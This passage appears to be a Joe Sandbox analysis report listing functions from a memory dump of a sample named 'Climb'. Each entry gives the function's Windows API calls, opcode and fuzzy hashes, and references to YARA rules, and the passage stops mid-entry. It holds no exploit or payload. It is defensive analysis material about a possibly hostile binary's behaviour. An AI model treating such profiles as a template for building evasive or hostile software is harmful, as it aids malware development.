Opcode Fuzzy Hash: 20efb2451bce2bafeb82d669d7a6a6553179568258335147ada9a5445ada29c0
Instruction Fuzzy Hash: D441B070604305AFCB21DF24DC95FFA7BE8EB4A334F140669FA65865B2C7309984DB62

Function 00121196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 001211B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001211EE
EnterCriticalSection.KERNEL32(?), ref: 0012120A
LeaveCriticalSection.KERNEL32(?), ref: 00121283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0012129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 001212C8

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 01a846873c79b631a182b4d7a0e26a50bd6d9b686cceeeeac4ec910c2fe961d3
Instruction ID: 537327ec695ee45ec4fab111d172880e84c6c85efa782697f0588ac55a32a6a1
Opcode Fuzzy Hash: 01a846873c79b631a182b4d7a0e26a50bd6d9b686cceeeeac4ec910c2fe961d3
Instruction Fuzzy Hash: 7C416D75900215EFDF04DF54EC85AAAB7B8FF44310F1480A5FD049A296DB30DEA1DBA0

Function 00148C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0010FBEF,00000000,?,?,00000000,?,000F39E2,00000004,00000000,00000000), ref: 00148CA7
EnableWindow.USER32(00000000,00000000), ref: 00148CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00148D2C
ShowWindow.USER32(00000000,00000004), ref: 00148D40
EnableWindow.USER32(00000000,00000001), ref: 00148D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00148D8A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 65ab50aeed5d4ef44dd7dde7952d6fb37338c736e0a1d5631b23840f61604747
Instruction ID: 735762f87ac47d97540a37357e30bc615d7f65aa182e5fcba83f87e6beae133a
Opcode Fuzzy Hash: 65ab50aeed5d4ef44dd7dde7952d6fb37338c736e0a1d5631b23840f61604747
Instruction Fuzzy Hash: A141EB34A02254AFDB26DF24D9C5FE97BF1FB45308F1440A9F5085B6B2CB356886CB50

Function 00132D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00132D45

Part of subcall function 0012EF33: GetWindowRect.USER32(?,?), ref: 0012EF4B

GetDesktopWindow.USER32 ref: 00132D6F
GetWindowRect.USER32(00000000), ref: 00132D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00132DB2
GetCursorPos.USER32(?), ref: 00132DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00132E3C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 9548bef4cb2e387221cfb434e79e7ec6f91e1e902e187bd1b1334312e9153fad
Instruction ID: 27db242d12968fb16903154ad6bf28d8415c44d3a86481bfa384402890291605
Opcode Fuzzy Hash: 9548bef4cb2e387221cfb434e79e7ec6f91e1e902e187bd1b1334312e9153fad
Instruction Fuzzy Hash: C4310072505325ABCB20EF54D849F9BBBA9FFC5354F00092AF88997191DB30E949CBD2

Function 001155E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 001155F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00115616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0011564E
_wcslen.LIBCMT ref: 0011566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00115674
_wcsstr.LIBVCRUNTIME ref: 0011567E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 3ce4d98719d5bc0e2ef80e11a23736c0a2ec58ec9f036387d5d5df239698107b
Instruction ID: 5f448446a78fe649d88db2af81f7445b76dba39be8993feedd2d22c06130206e
Opcode Fuzzy Hash: 3ce4d98719d5bc0e2ef80e11a23736c0a2ec58ec9f036387d5d5df239698107b
Instruction Fuzzy Hash: D221F975204600BBEB195B25AC49EFF7BA9DF85750F14803AF809CA191EB65DC81D6A0

Function 00126263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871

_wcslen.LIBCMT ref: 001262C0
CoInitialize.OLE32(00000000), ref: 001263DA
CoCreateInstance.OLE32(00150CC4,00000000,00000001,00150B34,?), ref: 001263F3
CoUninitialize.OLE32 ref: 00126411

Strings

.lnk, xrefs: 001262BB, 00126306, 001263CA

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: eb7de4c72496d90aca1b12fba6f826a818b1c9f2cca00601579ab10279ca5a2a
Instruction ID: 13f863e78dcb180f65904e9fe38d2fcf0344178bb1f010f36338cd528bbe7fa8
Opcode Fuzzy Hash: eb7de4c72496d90aca1b12fba6f826a818b1c9f2cca00601579ab10279ca5a2a
Instruction Fuzzy Hash: 19D14271A042119FC714DF24D480AAABBF5FF89714F14885DF8899B3A2CB31EC45CB92

Function 001486FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00148740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00148765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0014877D
GetSystemMetrics.USER32(00000004), ref: 001487A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0012C1F2,00000000), ref: 001487C6

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

GetSystemMetrics.USER32(00000004), ref: 001487B1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 3726bd5fc664a31935b0cc62fdfe1bb1898749b3386ae219c9b947f2288a7650
Instruction ID: ed009ec419a677b284fb33b2138294c685169b01f8ef64ecda21cc8562586477
Opcode Fuzzy Hash: 3726bd5fc664a31935b0cc62fdfe1bb1898749b3386ae219c9b947f2288a7650
Instruction Fuzzy Hash: 0321AF75610251AFCF189F38DC58A6E3BA5EB8537AF254629F926C35F0EF308890CB10

Function 000D36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,000D36E9,000D3355), ref: 000D3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000D370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3727
SetLastError.KERNEL32(00000000,?,000D36E9,000D3355), ref: 000D3779

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9581f8e16a7a9d7b36232d35683bb73a7d16676c70431e2cc2ef48361f0642ff
Instruction ID: a72195be1dfbf64154c7cec6549d7ce2db15c8bbc7a627f904a4630eb6f69e12
Opcode Fuzzy Hash: 9581f8e16a7a9d7b36232d35683bb73a7d16676c70431e2cc2ef48361f0642ff
Instruction Fuzzy Hash: B00124F661EB112EA6B427B8BCC65AB2AF4FF05771720122BF014503F2EF114D829162

Function 000E30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,000D4D53,00000000,?,?,000D68E2,?,?,00000000), ref: 000E30EB
_free.LIBCMT ref: 000E311E
_free.LIBCMT ref: 000E3146
SetLastError.KERNEL32(00000000,?,00000000), ref: 000E3153
SetLastError.KERNEL32(00000000,?,00000000), ref: 000E315F
_abort.LIBCMT ref: 000E3165

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 995b5fd1f1088945496ff7e1e3754c6dd8962ddbbfba1866dcd4b7ce78246e25
Instruction ID: 9bf5cd665731ba4c137f7ccfee36d315a616b9c027827732567dda9f3bb69ca1
Opcode Fuzzy Hash: 995b5fd1f1088945496ff7e1e3754c6dd8962ddbbfba1866dcd4b7ce78246e25
Instruction Fuzzy Hash: 1CF0A9765445843EC6116737BC0EA9E1AA9AFC1770B21056CFA14B32E3EE218A424161

Function 00149480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000B1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1F87
Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1F96
Part of subcall function 000B1F2D: BeginPath.GDI32(?), ref: 000B1FAD
Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001494AA
LineTo.GDI32(?,00000003,00000000), ref: 001494BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001494CC
LineTo.GDI32(?,00000000,00000003), ref: 001494DC
EndPath.GDI32(?), ref: 001494EC
StrokePath.GDI32(?), ref: 001494FC

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: fcb416664f0b51377a1212b957907bd717f7d51414f018d768a3a30edf6e5dd7
Instruction ID: a9131625dacb1a2427ee2b26cd813a201db8a42bbae346b427a3c039cc891dd9
Opcode Fuzzy Hash: fcb416664f0b51377a1212b957907bd717f7d51414f018d768a3a30edf6e5dd7
Instruction Fuzzy Hash: 70110976000109BFDF029F90EC88EEA7F6DEB09364F048021FE194A571C7719E95DBA0

Function 00115B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00115B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00115B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00115B94
ReleaseDC.USER32(00000000,00000000), ref: 00115B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00115BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00115BC5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: cb6ca5ce0662879bba1fa992528267a73322285d954a5302a35db9c780738272
Instruction ID: b3d5251a142a48638c578a1204fbeb5e2d2132c9c0fb7643d837c2cd6e541f50
Opcode Fuzzy Hash: cb6ca5ce0662879bba1fa992528267a73322285d954a5302a35db9c780738272
Instruction Fuzzy Hash: 61014475E00718BBEF149FA59C49E4E7F79EB49751F004065FA09A7290D6709C41CB94

Function 000B327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 000B32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 000B32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 000B32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 000B32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 000B32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 000B32DD

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c8435ea48c7baa7b3d7fb2c54beb8a6b7ed5eb2ee28b3c81fb9e788a883536c7
Instruction ID: a89e63e29c009da6e446c4c903fc7d3b63f2150d0f042815bc138f0ede14f0d4
Opcode Fuzzy Hash: c8435ea48c7baa7b3d7fb2c54beb8a6b7ed5eb2ee28b3c81fb9e788a883536c7
Instruction Fuzzy Hash: 10016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5

Function 0011F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0011F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0011F45D
GetWindowThreadProcessId.USER32(?,?), ref: 0011F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0011F48C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7494bf62c6973cff2bfeef7a346cfd780d7e4d9dc7aeeb3b61a84d655a8f6d59
Instruction ID: 4db25173eaed03526b6367109fd149af72fdf7e6e8d381d38222f5a6dda45076
Opcode Fuzzy Hash: 7494bf62c6973cff2bfeef7a346cfd780d7e4d9dc7aeeb3b61a84d655a8f6d59
Instruction Fuzzy Hash: 7EF03076241158BBEB215B52AC0EEEF3B7CEFC7B11F000058FA05914A0D7A45A81C6B5

Function 000F34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 000F34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 000F3506
GetWindowDC.USER32(?), ref: 000F3512
GetPixel.GDI32(00000000,?,?), ref: 000F3521
ReleaseDC.USER32(?,00000000), ref: 000F3533
GetSysColor.USER32(00000005), ref: 000F354D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 1de09c32ebf80990a0745514222dce053e2ac6bf844930ec293afc6b6f01f324
Instruction ID: 4b62e4f740f94dc71584b5d4165121c789e4f28cfb6bb5eeac647856b9f4d971
Opcode Fuzzy Hash: 1de09c32ebf80990a0745514222dce053e2ac6bf844930ec293afc6b6f01f324
Instruction Fuzzy Hash: C4012835600509EFDF515BA4EC08BE97BB1FB49721F510560FA1AA25B1CB311E91AB10

Function 001121C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001121CC
UnloadUserProfile.USERENV(?,?), ref: 001121D8
CloseHandle.KERNEL32(?), ref: 001121E1
CloseHandle.KERNEL32(?), ref: 001121E9
GetProcessHeap.KERNEL32(00000000,?), ref: 001121F2
HeapFree.KERNEL32(00000000), ref: 001121F9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 39c9273071e6247945c2a2b6a6622399eb2d7b98da2f4098644af7f421c3fd22
Instruction ID: 5ee63f8d75f483ad9dd93d4119c9979fa16367bc26354172a24e84b6938065d0
Opcode Fuzzy Hash: 39c9273071e6247945c2a2b6a6622399eb2d7b98da2f4098644af7f421c3fd22
Instruction Fuzzy Hash: 1EE09ABA104505BFDF011FA5FC0DD4ABF79FF4A722B514625F62982870CB3294A1DB51

Function 0011CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011CF99
_wcslen.LIBCMT ref: 0011CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0011D075

Strings

0, xrefs: 0011CF5A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 87fa647033d1725fdcb8338ed26e25003c57bacc0677633e9494d97be62be8fb
Instruction ID: b4125b3a865a2cc2e76fff48d2c298c3c7992a204df4aab998c7862a4c57bb30
Opcode Fuzzy Hash: 87fa647033d1725fdcb8338ed26e25003c57bacc0677633e9494d97be62be8fb
Instruction Fuzzy Hash: 6751D3716043019BD719AF28E845BEBB7E8AF49354F040A3DF995D3291DB70CD86CB92

Function 0013B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0013B903

Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF

GetProcessId.KERNEL32(00000000), ref: 0013B998
CloseHandle.KERNEL32(00000000), ref: 0013B9C7

Strings

<, xrefs: 0013B8CB
@, xrefs: 0013B8D2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 6df4a8fccf3f0048863ff6e57900138a12439926e9426ef3318dfda6dd7502ab
Instruction ID: 152715db909e21e53eaabfb2fe9dfb65c370e37f1bf412256006042b54c2da68
Opcode Fuzzy Hash: 6df4a8fccf3f0048863ff6e57900138a12439926e9426ef3318dfda6dd7502ab
Instruction Fuzzy Hash: 1C714574A00219DFCB14EF64C494ADEBBB4FF08314F048499E95AAB362DB74EE41CB90

Function 00117B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00117B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00117BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00117BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00117C36

Strings

